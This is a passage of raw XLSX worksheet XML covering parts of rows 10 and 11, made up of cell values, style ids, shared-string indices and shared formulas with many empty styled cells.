      <c r="FS10" s="112">
        <v>1.0</v>
      </c>
      <c r="FT10" s="112">
        <v>1.0</v>
      </c>
      <c r="FU10" s="112">
        <v>1.0</v>
      </c>
      <c r="FV10" s="112">
        <v>0.0</v>
      </c>
      <c r="FW10" s="112">
        <v>4.0</v>
      </c>
      <c r="FX10" s="112">
        <v>4.0</v>
      </c>
      <c r="FY10" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ10" s="112">
        <v>0.0</v>
      </c>
      <c r="GA10" s="112">
        <v>0.0</v>
      </c>
      <c r="GB10" s="112">
        <v>0.0</v>
      </c>
      <c r="GC10" s="112">
        <v>0.0</v>
      </c>
      <c r="GD10" s="112">
        <v>0.0</v>
      </c>
      <c r="GE10" s="112">
        <v>0.0</v>
      </c>
      <c r="GF10" s="112">
        <v>0.0</v>
      </c>
      <c r="GG10" s="112">
        <v>0.0</v>
      </c>
      <c r="GH10" s="113">
        <f t="shared" si="39"/>
        <v>1</v>
      </c>
      <c r="GI10" s="113">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="GJ10" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK10" s="113">
        <f t="shared" si="42"/>
        <v>1</v>
      </c>
      <c r="GL10" s="113">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="GM10" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN10" s="113">
        <f t="shared" si="45"/>
        <v>4</v>
      </c>
      <c r="GO10" s="113">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="GP10" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ10" s="114">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="GR10" s="113">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="GS10" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT10" s="94"/>
      <c r="GU10" s="116"/>
      <c r="GV10" s="116"/>
      <c r="GW10" s="116"/>
      <c r="GX10" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY10" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ10" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA10" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB10" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC10" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD10" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE10" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF10" s="117" t="str">
        <f t="shared" si="50"/>
        <v>-</v>
      </c>
      <c r="HG10" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH10" s="116">
        <v>16060.0</v>
      </c>
      <c r="HI10" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ10" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK10" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL10" s="93">
        <v>1.0</v>
      </c>
      <c r="HM10" s="93">
        <f t="shared" si="52"/>
        <v>1</v>
      </c>
      <c r="HN10" s="93">
        <v>0.0</v>
      </c>
      <c r="HO10" s="93">
        <v>1.0</v>
      </c>
      <c r="HP10" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ10" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR10" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS10" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT10" s="119" t="s">
        <v>218</v>
      </c>
      <c r="HU10" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV10" s="119">
        <v>31914.0</v>
      </c>
      <c r="HW10" s="119">
        <v>1.0</v>
      </c>
      <c r="HX10" s="119">
        <v>1.0</v>
      </c>
      <c r="HY10" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ10" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA10" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB10" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC10" s="120">
        <f t="shared" si="61"/>
        <v>31914</v>
      </c>
      <c r="ID10" s="120">
        <v>31914.0</v>
      </c>
      <c r="IE10" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF10" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG10" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH10" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II10" s="99" t="s">
        <v>369</v>
      </c>
      <c r="IJ10" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK10" s="99">
        <v>1.0</v>
      </c>
      <c r="IL10" s="99">
        <v>1.0</v>
      </c>
      <c r="IM10" s="121">
        <f t="shared" si="57"/>
        <v>1</v>
      </c>
      <c r="IN10" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO10" s="98">
        <v>1.0</v>
      </c>
      <c r="IP10" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ10" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR10" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS10" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT10" s="127"/>
      <c r="IU10" s="127"/>
      <c r="IV10" s="127"/>
      <c r="IW10" s="127"/>
      <c r="IX10" s="127"/>
      <c r="IY10" s="127"/>
      <c r="IZ10" s="127"/>
      <c r="JA10" s="127"/>
      <c r="JB10" s="127"/>
      <c r="JC10" s="127"/>
      <c r="JD10" s="127"/>
      <c r="JE10" s="127"/>
      <c r="JF10" s="127"/>
      <c r="JG10" s="127"/>
      <c r="JH10" s="127"/>
      <c r="JI10" s="127"/>
      <c r="JJ10" s="127"/>
      <c r="JK10" s="127"/>
      <c r="JL10" s="127"/>
      <c r="JM10" s="127"/>
      <c r="JN10" s="127"/>
      <c r="JO10" s="127"/>
      <c r="JP10" s="127"/>
      <c r="JQ10" s="127"/>
      <c r="JR10" s="127"/>
      <c r="JS10" s="127"/>
      <c r="JT10" s="127"/>
      <c r="JU10" s="127"/>
      <c r="JV10" s="127"/>
      <c r="JW10" s="127"/>
      <c r="JX10" s="127"/>
      <c r="JY10" s="127"/>
      <c r="JZ10" s="127"/>
      <c r="KA10" s="127"/>
      <c r="KB10" s="127"/>
      <c r="KC10" s="127"/>
      <c r="KD10" s="127"/>
      <c r="KE10" s="127"/>
      <c r="KF10" s="127"/>
      <c r="KG10" s="127"/>
      <c r="KH10" s="127"/>
      <c r="KI10" s="127"/>
      <c r="KJ10" s="127"/>
      <c r="KK10" s="127"/>
      <c r="KL10" s="127"/>
      <c r="KM10" s="127"/>
      <c r="KN10" s="127"/>
      <c r="KO10" s="127"/>
      <c r="KP10" s="127"/>
      <c r="KQ10" s="127"/>
      <c r="KR10" s="127"/>
      <c r="KS10" s="127"/>
      <c r="KT10" s="127"/>
      <c r="KU10" s="127"/>
      <c r="KV10" s="127"/>
      <c r="KW10" s="127"/>
      <c r="KX10" s="127"/>
      <c r="KY10" s="127"/>
      <c r="KZ10" s="127"/>
      <c r="LA10" s="127"/>
      <c r="LB10" s="127"/>
      <c r="LC10" s="127"/>
      <c r="LD10" s="127"/>
      <c r="LE10" s="127"/>
      <c r="LF10" s="127"/>
      <c r="LG10" s="127"/>
      <c r="LH10" s="127"/>
      <c r="LI10" s="127"/>
      <c r="LJ10" s="127"/>
      <c r="LK10" s="127"/>
      <c r="LL10" s="127"/>
      <c r="LM10" s="127"/>
      <c r="LN10" s="127"/>
      <c r="LO10" s="127"/>
      <c r="LP10" s="127"/>
      <c r="LQ10" s="127"/>
      <c r="LR10" s="127"/>
      <c r="LS10" s="127"/>
      <c r="LT10" s="127"/>
      <c r="LU10" s="127"/>
      <c r="LV10" s="127"/>
      <c r="LW10" s="127"/>
      <c r="LX10" s="127"/>
      <c r="LY10" s="127"/>
      <c r="LZ10" s="127"/>
      <c r="MA10" s="127"/>
      <c r="MB10" s="127"/>
      <c r="MC10" s="127"/>
      <c r="MD10" s="127"/>
      <c r="ME10" s="127"/>
      <c r="MF10" s="127"/>
      <c r="MG10" s="127"/>
      <c r="MH10" s="127"/>
      <c r="MI10" s="127"/>
      <c r="MJ10" s="127"/>
      <c r="MK10" s="127"/>
      <c r="ML10" s="127"/>
      <c r="MM10" s="127"/>
      <c r="MN10" s="127"/>
      <c r="MO10" s="127"/>
      <c r="MP10" s="127"/>
      <c r="MQ10" s="127"/>
      <c r="MR10" s="127"/>
      <c r="MS10" s="127"/>
      <c r="MT10" s="127"/>
      <c r="MU10" s="127"/>
      <c r="MV10" s="127"/>
      <c r="MW10" s="127"/>
      <c r="MX10" s="127"/>
      <c r="MY10" s="127"/>
      <c r="MZ10" s="127"/>
      <c r="NA10" s="127"/>
      <c r="NB10" s="127"/>
      <c r="NC10" s="127"/>
      <c r="ND10" s="127"/>
      <c r="NE10" s="127"/>
      <c r="NF10" s="127"/>
      <c r="NG10" s="127"/>
      <c r="NH10" s="127"/>
      <c r="NI10" s="127"/>
      <c r="NJ10" s="127"/>
      <c r="NK10" s="127"/>
      <c r="NL10" s="127"/>
      <c r="NM10" s="127"/>
      <c r="NN10" s="127"/>
      <c r="NO10" s="127"/>
      <c r="NP10" s="127"/>
      <c r="NQ10" s="127"/>
      <c r="NR10" s="127"/>
      <c r="NS10" s="127"/>
      <c r="NT10" s="127"/>
      <c r="NU10" s="127"/>
      <c r="NV10" s="127"/>
      <c r="NW10" s="127"/>
      <c r="NX10" s="127"/>
      <c r="NY10" s="127"/>
    </row>
    <row r="11" ht="237.0" customHeight="1">
      <c r="B11" s="89" t="s">
        <v>292</v>
      </c>
      <c r="C11" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D11" s="90" t="s">
        <v>293</v>
      </c>
      <c r="E11" s="90" t="s">
        <v>370</v>
      </c>
      <c r="F11" s="90" t="s">
        <v>371</v>
      </c>
      <c r="G11" s="91" t="s">
        <v>12</v>
      </c>
      <c r="H11" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I11" s="92" t="s">
        <v>372</v>
      </c>
      <c r="J11" s="92" t="s">
        <v>373</v>
      </c>
      <c r="K11" s="92" t="s">
        <v>374</v>
      </c>
      <c r="L11" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M11" s="93">
        <v>9.0</v>
      </c>
      <c r="N11" s="93">
        <v>1.0</v>
      </c>
      <c r="O11" s="93">
        <v>1.0</v>
      </c>
      <c r="P11" s="93">
        <v>1.0</v>
      </c>
      <c r="Q11" s="93">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R11" s="93">
        <v>1.0</v>
      </c>
      <c r="S11" s="93">
        <v>1.0</v>
      </c>
      <c r="T11" s="94" t="s">
        <v>376</v>
      </c>
      <c r="U11" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V11" s="96" t="s">
        <v>377</v>
      </c>
      <c r="W11" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X11" s="97" t="s">
        <v>378</v>
      </c>
      <c r="Y11" s="96" t="s">
        <v>379</v>
      </c>
      <c r="Z11" s="96" t="s">
        <v>380</v>
      </c>
      <c r="AA11" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB11" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC11" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD11" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE11" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF11" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG11" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH11" s="99" t="s">
        <v>381</v>
      </c>
      <c r="AI11" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ11" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK11" s="100">
        <v>1917.0</v>
      </c>
      <c r="AL11" s="100">
        <v>1.0</v>
      </c>
      <c r="AM11" s="100">
        <v>16.0</v>
      </c>
      <c r="AN11" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO11" s="100">
        <v>1917.0</v>
      </c>
      <c r="AP11" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ11" s="100">
        <v>16.0</v>
      </c>
      <c r="AR11" s="100">
        <v>1917.0</v>
      </c>
      <c r="AS11" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT11" s="100">
        <f t="shared" si="2"/>
        <v>1917</v>
      </c>
      <c r="AU11" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV11" s="100">
        <v>1917.0</v>
      </c>
      <c r="AW11" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX11" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY11" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ11" s="100">
        <v>0.0</v>
      </c>
      <c r="BA11" s="102">
        <v>9.0</v>
      </c>
      <c r="BB11" s="102">
        <v>4.0</v>
      </c>
      <c r="BC11" s="102">
        <v>16.0</v>
      </c>
      <c r="BD11" s="102">
        <v>16.0</v>
      </c>
      <c r="BE11" s="102">
        <v>0.0</v>
      </c>
      <c r="BF11" s="102">
        <v>0.0</v>
      </c>
      <c r="BG11" s="102">
        <v>0.0</v>
      </c>
      <c r="BH11" s="102">
        <v>0.0</v>
      </c>
      <c r="BI11" s="102">
        <v>4.0</v>
      </c>
      <c r="BJ11" s="102">
        <v>16.0</v>
      </c>
      <c r="BK11" s="102">
        <v>16.0</v>
      </c>
      <c r="BL11" s="103">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="BM11" s="103">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="BN11" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO11" s="103">
        <f t="shared" si="6"/>
        <v>16</v>
      </c>
      <c r="BP11" s="103">
        <f t="shared" si="7"/>
        <v>16</v>
      </c>
      <c r="BQ11" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR11" s="103">
        <f t="shared" si="9"/>
        <v>16</v>
      </c>
      <c r="BS11" s="103">
        <f t="shared" si="10"/>
        <v>16</v>
      </c>
      <c r="BT11" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU11" s="103">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="BV11" s="103">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="BW11" s="134" t="s">
        <v>382</v>
      </c>
      <c r="BX11" s="104">
        <v>3.0</v>
      </c>
      <c r="BY11" s="104">
        <v>18.0</v>
      </c>
      <c r="BZ11" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA11" s="134" t="s">
        <v>382</v>
      </c>
      <c r="CB11" s="134">
        <v>3.0</v>
      </c>
      <c r="CC11" s="134">
        <v>18.0</v>
      </c>
      <c r="CD11" s="134" t="s">
        <v>382</v>
      </c>
      <c r="CE11" s="134" t="s">
        <v>12</v>
      </c>
      <c r="CF11" s="104" t="str">
        <f t="shared" si="14"/>
        <v>2027792, 2027793, 1917</v>
      </c>
      <c r="CG11" s="134" t="s">
        <v>383</v>
      </c>
      <c r="CH11" s="104">
        <v>1917.0</v>
      </c>
      <c r="CI11" s="134" t="s">
        <v>383</v>
      </c>
      <c r="CJ11" s="134" t="s">
        <v>12</v>
      </c>
      <c r="CK11" s="104">
        <v>2.0</v>
      </c>
      <c r="CL11" s="104">
        <v>2.0</v>
      </c>
      <c r="CM11" s="105">
        <v>9.0</v>
      </c>
      <c r="CN11" s="105">
        <v>5.0</v>
      </c>
      <c r="CO11" s="105">
        <v>18.0</v>
      </c>
      <c r="CP11" s="105">
        <v>16.0</v>
      </c>
      <c r="CQ11" s="105">
        <v>2.0</v>
      </c>
      <c r="CR11" s="105">
        <v>18.0</v>
      </c>
      <c r="CS11" s="105">
        <v>0.0</v>
      </c>
      <c r="CT11" s="105">
        <v>1.0</v>
      </c>
      <c r="CU11" s="105">
        <v>0.0</v>
      </c>
      <c r="CV11" s="105">
        <v>0.0</v>
      </c>
      <c r="CW11" s="105">
        <v>5.0</v>
      </c>
      <c r="CX11" s="105">
        <v>18.0</v>
      </c>
      <c r="CY11" s="105">
        <v>16.0</v>
      </c>
      <c r="CZ11" s="105">
        <v>2.0</v>
      </c>
      <c r="DA11" s="105">
        <v>18.0</v>
      </c>
      <c r="DB11" s="106">
        <f t="shared" si="15"/>
        <v>5</v>
      </c>
      <c r="DC11" s="106">
        <f t="shared" si="16"/>
        <v>5</v>
      </c>
      <c r="DD11" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE11" s="106">
        <f t="shared" si="18"/>
        <v>18</v>
      </c>
      <c r="DF11" s="106">
        <f t="shared" si="19"/>
        <v>18</v>
      </c>
      <c r="DG11" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH11" s="106">
        <f t="shared" si="21"/>
        <v>18</v>
      </c>
      <c r="DI11" s="106">
        <f t="shared" si="22"/>
        <v>18</v>
      </c>
      <c r="DJ11" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK11" s="107">
        <f t="shared" si="24"/>
        <v>0.5</v>
      </c>
      <c r="DL11" s="106">
        <f t="shared" si="25"/>
        <v>1</v>
      </c>
      <c r="DM11" s="135" t="s">
        <v>382</v>
      </c>
      <c r="DN11" s="108">
        <v>3.0</v>
      </c>
      <c r="DO11" s="108">
        <v>18.0</v>
      </c>
      <c r="DP11" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ11" s="135" t="s">
        <v>382</v>
      </c>
      <c r="DR11" s="108">
        <v>3.0</v>
      </c>
      <c r="DS11" s="108">
        <v>18.0</v>
      </c>
      <c r="DT11" s="135" t="s">
        <v>382</v>
      </c>
      <c r="DU11" s="135" t="s">
        <v>12</v>
      </c>
      <c r="DV11" s="108" t="str">
        <f t="shared" si="63"/>
        <v>2027792, 2027793, 1917</v>
      </c>
      <c r="DW11" s="135" t="s">
        <v>383</v>
      </c>
      <c r="DX11" s="135">
        <v>1917.0</v>
      </c>
      <c r="DY11" s="135" t="s">
        <v>383</v>
      </c>
      <c r="DZ11" s="135" t="s">
        <v>12</v>
      </c>
      <c r="EA11" s="108">
        <v>2.0</v>
      </c>
      <c r="EB11" s="108">
        <v>2.0</v>
      </c>
      <c r="EC11" s="109">
        <v>9.0</v>
      </c>
      <c r="ED11" s="109">
        <v>5.0</v>
      </c>
      <c r="EE11" s="109">
        <v>18.0</v>
      </c>
      <c r="EF11" s="109">
        <v>16.0</v>
      </c>
      <c r="EG11" s="109">
        <v>2.0</v>
      </c>
      <c r="EH11" s="109">
        <v>18.0</v>
      </c>
      <c r="EI11" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ11" s="109">
        <v>1.0</v>
      </c>
      <c r="EK11" s="109">
        <v>0.0</v>
      </c>
      <c r="EL11" s="109">
        <v>0.0</v>
      </c>
      <c r="EM11" s="109">
        <v>5.0</v>
      </c>
      <c r="EN11" s="109">
        <v>18.0</v>
      </c>
      <c r="EO11" s="109">
        <v>16.0</v>
      </c>
      <c r="EP11" s="109">
        <v>2.0</v>
      </c>
      <c r="EQ11" s="109">
        <v>18.0</v>
      </c>
      <c r="ER11" s="110">
        <f t="shared" si="27"/>
        <v>5</v>
      </c>
      <c r="ES11" s="110">
        <f t="shared" si="28"/>
        <v>5</v>
      </c>
      <c r="ET11" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU11" s="110">
        <f t="shared" si="30"/>
        <v>18</v>
      </c>
      <c r="EV11" s="110">
        <f t="shared" si="31"/>
        <v>18</v>
      </c>
      <c r="EW11" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX11" s="110">
        <f t="shared" si="33"/>
        <v>18</v>
      </c>
      <c r="EY11" s="110">
        <f t="shared" si="34"/>
        <v>18</v>
      </c>
      <c r="EZ11" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA11" s="110">
        <f t="shared" si="36"/>
        <v>0.5</v>
      </c>
      <c r="FB11" s="110">
        <f t="shared" si="37"/>
        <v>1</v>
      </c>
      <c r="FC11" s="111" t="s">
        <v>384</v>
      </c>
      <c r="FD11" s="111">
        <v>6.0</v>
      </c>
      <c r="FE11" s="111">
        <v>36.0</v>
      </c>
      <c r="FF11" s="101" t="s">
        <v>385</v>
      </c>
      <c r="FG11" s="111" t="s">
        <v>386</v>
      </c>
      <c r="FH11" s="111">
        <v>3.0</v>
      </c>
      <c r="FI11" s="111">
        <v>18.0</v>
      </c>
      <c r="FJ11" s="111" t="s">
        <v>387</v>
      </c>
      <c r="FK11" s="136" t="s">
        <v>385</v>
      </c>
      <c r="FL11" s="111" t="str">
        <f t="shared" si="64"/>
        <v>2027792, 2027793, 2002752, 2002749, 2101917, 1917</v>
      </c>
      <c r="FM11" s="136" t="s">
        <v>383</v>
      </c>
      <c r="FN11" s="111" t="s">
        <v>388</v>
      </c>
      <c r="FO11" s="136" t="s">
        <v>383</v>
      </c>
      <c r="FP11" s="136" t="s">
        <v>12</v>
      </c>
      <c r="FQ11" s="111">
        <v>2.0</v>
      </c>
      <c r="FR11" s="111">
        <v>2.0</v>
      </c>
      <c r="FS11" s="112">
        <v>9.0</v>
      </c>
      <c r="FT11" s="112">
        <v>5.0</v>
      </c>
      <c r="FU11" s="112">
        <v>19.0</v>
      </c>
      <c r="FV11" s="112">
        <v>16.0</v>
      </c>
      <c r="FW11" s="112">
        <v>20.0</v>
      </c>
      <c r="FX11" s="112">
        <v>20.0</v>
      </c>
      <c r="FY11" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ11" s="112">
        <v>1.0</v>
      </c>
      <c r="GA11" s="112">
        <v>0.0</v>
      </c>
      <c r="GB11" s="112">
        <v>0.0</v>
      </c>
      <c r="GC11" s="112">
        <v>5.0</v>
      </c>
      <c r="GD11" s="112">
        <v>18.0</v>
      </c>
      <c r="GE11" s="112">
        <v>16.0</v>
      </c>
      <c r="GF11" s="112">
        <v>2.0</v>
      </c>
      <c r="GG11" s="112">
        <v>18.0</v>
      </c>
      <c r="GH11" s="113">
        <f t="shared" si="39"/>
        <v>5</v>
      </c>
      <c r="GI11" s="113">
        <f t="shared" si="40"/>
        <v>5</v>
      </c>
      <c r="GJ11" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK11" s="113">
        <f t="shared" si="42"/>
        <v>19</v>
      </c>
      <c r="GL11" s="113">
        <f t="shared" si="43"/>
        <v>18</v>
      </c>
      <c r="GM11" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN11" s="113">
        <f t="shared" si="45"/>
        <v>20</v>
      </c>
      <c r="GO11" s="113">
        <f t="shared" si="46"/>
        <v>18</v>
      </c>
      <c r="GP11" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ11" s="114">
        <f t="shared" si="48"/>
        <v>0.5</v>
      </c>
      <c r="GR11" s="113">
        <f t="shared" si="49"/>
        <v>1</v>
      </c>
      <c r="GS11" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT11" s="94"/>
      <c r="GU11" s="130">
        <v>52169.0</v>
      </c>
      <c r="GV11" s="116">
        <v>1.0</v>
      </c>
      <c r="GW11" s="116">
        <v>6.0</v>
      </c>
      <c r="GX11" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY11" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ11" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA11" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB11" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC11" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD11" s="131">
        <v>52676.0</v>
      </c>
      <c r="HE11" s="131">
        <v>52676.0</v>
      </c>
      <c r="HF11" s="117" t="str">
        <f t="shared" si="50"/>
        <v>-</v>
      </c>
      <c r="HG11" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH11" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI11" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ11" s="93" t="s">
        <v>389</v>
      </c>
      <c r="HK11" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL11" s="93">
        <v>7.0</v>
      </c>
      <c r="HM11" s="93">
        <f t="shared" si="52"/>
        <v>0</v>
      </c>
      <c r="HN11" s="93">
        <v>0.0</v>
      </c>
      <c r="HO11" s="93">
        <v>0.0</v>
      </c>
      <c r="HP11" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ11" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR11" s="118">
        <f t="shared" si="54"/>
        <v>0.5</v>
      </c>
      <c r="HS11" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT11" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HU11" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV11" s="119" t="s">
        <v>390</v>
      </c>
      <c r="HW11" s="119">
        <v>3.0</v>
      </c>
      <c r="HX11" s="119">
        <v>8.0</v>
      </c>
      <c r="HY11" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ11" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA11" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB11" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC11" s="120" t="s">
        <v>391</v>
      </c>
      <c r="ID11" s="120" t="s">
        <v>392</v>
      </c>
      <c r="IE11" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF11" s="120">
        <v>94634.0</v>
      </c>
      <c r="IG11" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH11" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II11" s="99" t="s">
        <v>393</v>
      </c>
      <c r="IJ11" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK11" s="99">
        <v>3.0</v>
      </c>
      <c r="IL11" s="99">
        <v>0.0</v>
      </c>
      <c r="IM11" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN11" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO11" s="98">
        <v>2.0</v>
      </c>
      <c r="IP11" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ11" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR11" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS11" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT11" s="127"/>
      <c r="IU11" s="127"/>
      <c r="IV11" s="127"/>
      <c r="IW11" s="127"/>
      <c r="IX11" s="127"/>
      <c r="IY11" s="127"/>
      <c r="IZ11" s="127"/>
      <c r="JA11" s="127"/>
      <c r="JB11" s="127"/>
      <c r="JC11" s="127"/>
      <c r="JD11" s="127"/>
      <c r="JE11" s="127"/>
      <c r="JF11" s="127"/>
      <c r="JG11" s="127"/>
      <c r="JH11" s="127"/>
      <c r="JI11" s="127"/>
      <c r="JJ11" s="127"/>
      <c r="JK11" s="127"/>
      <c r="JL11" s="127"/>
      <c r="JM11" s="127"/>
      <c r="JN11" s="127"/>
      <c r="JO11" s="127"/>
      <c r="JP11" s="127"/>
      <c r="JQ11" s="127"/>
      <c r="JR11" s="127"/>
      <c r="JS11" s="127"/>
      <c r="JT11" s="127"/>
      <c r="JU11" s="127"/>
      <c r="JV11" s="127"/>
      <c r="JW11" s="127"/>
      <c r="JX11" s="127"/>
      <c r="JY11" s="127"/>
      <c r="JZ11" s="127"/>
      <c r="KA11" s="127"/>
      <c r="KB11" s="127"/>
      <c r="KC11" s="127"/>
      <c r="KD11" s="127"/>
      <c r="KE11" s="127"/>
      <c r="KF11" s="127"/>
      <c r="KG11" s="127"/>
      <c r="KH11" s="127"/>
      <c r="KI11" s="127"/>
      <c r="KJ11" s="127"/>
      <c r="KK11" s="127"/>
      <c r="KL11" s="127"/>
      <c r="KM11" s="127"/>
      <c r="KN11" s="127"/>
      <c r="KO11" s="127"/>
      <c r="KP11" s="127"/>
      <c r="KQ11" s="127"/>
      <c r="KR11" s="127"/>
      <c r="KS11" s="127"/>
      <c r="KT11" s="127"/>
      <c r="KU11" s="127"/>
      <c r="KV11" s="127"/>
      <c r="KW11" s="127"/>
      <c r="KX11" s="127"/>
      <c r="KY11" s="127"/>
      <c r="KZ11" s="127"/>
      <c r="LA11" s="127"/>
      <c r="LB11" s="127"/>
      <c r="LC11" s="127"/>
      <c r="LD11" s="127"/>
      <c r="LE11" s="127"/>
      <c r="LF11" s="127"/>
      <c r="LG11" s="127"/>
      <c r="LH11" s="127"/>
      <c r="LI11" s="127"/>
      <c r="LJ11" s="127"/>
      <c r="LK11" s="127"/>
      <c r="LL11" s="127"/>
      <c r="LM11" s="127"/>
      <c r="LN11" s="127"/>
      <c r="LO11" s="127"/>
      <c r="LP11" s="127"/>
      <c r="LQ11" s="127"/>
      <c r="LR11" s="127"/>
      <c r="LS11" s="127"/>
      <c r="LT11" s="127"/>
      <c r="LU11" s="127"/>
      <c r="LV11" s="127"/>
      <c r="LW11" s="127"/>
      <c r="LX11" s="127"/>
      <c r="LY11" s="127"/>
      <c r="LZ11" s="127"/>
      <c r="MA11" s="127"/>
      <c r="MB11" s="127"/>
      <c r="MC11" s="127"/>
      <c r="MD11" s="127"/>
      <c r="ME11" s="127"/>
      <c r="MF11" s="127"/>
      <c r="MG11" s="127"/>
      <c r="MH11" s="127"/>
